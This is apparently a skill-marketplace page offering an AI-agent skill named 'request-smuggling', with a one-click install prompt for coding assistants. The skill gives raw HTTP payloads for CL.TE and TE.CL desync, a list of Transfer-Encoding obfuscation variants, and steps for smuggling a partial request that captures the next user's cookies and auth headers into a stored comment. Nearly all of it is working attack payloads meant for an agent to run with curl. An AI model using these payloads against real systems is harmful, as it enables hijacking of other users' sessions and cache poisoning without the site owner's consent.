com um clique
request-smuggling
HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning
Instalar com Codex ou Claude Copie este prompt, cole no Codex, Claude ou outro assistente e deixe que ele revise a página da skill e instale para você.
Menu
HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning
Instalar com Codex ou Claude Copie este prompt, cole no Codex, Claude ou outro assistente e deixe que ele revise a página da skill e instale para você.
Baseado na classificação ocupacional SOC
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | request-smuggling |
| description | HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning |
| origin | RedteamOpencode |
run_tool curl (raw request crafting)Send request with both CL and TE headers: ``` POST / HTTP/1.1 Host: target.com Content-Length: 6 Transfer-Encoding: chunked
0
G
```
If next request gets GPOST → CL.TE confirmed
Time-based: backend waits for more chunked data → timeout difference
Send: ``` POST / HTTP/1.1 Host: target.com Content-Length: 3 Transfer-Encoding: chunked
1
G
0
```
If next request returns unexpected response → TE.CL confirmed
Time-based: backend reads CL bytes only, rest poisons next request
Transfer-Encoding: chunked (standard)Transfer-Encoding : chunked (space before colon)Transfer-Encoding: chunked\r\nTransfer-Encoding: xTransfer-Encoding: x\r\nTransfer-Encoding: chunkedTransfer-Encoding:\tchunked (tab)Transfer-Encoding: chunked (extra space)X: x\r\nTransfer-Encoding: chunked (header injection)TrAnSfEr-EnCoDiNg: chunkedTransfer-Encoding:\n chunked/admin path that frontend blocksSmuggle partial request that captures next user's request: ``` POST /store-comment HTTP/1.1 Content-Length: 400
comment=
```
Next user's request (with cookies/auth) appended to comment body
Read stolen headers from stored location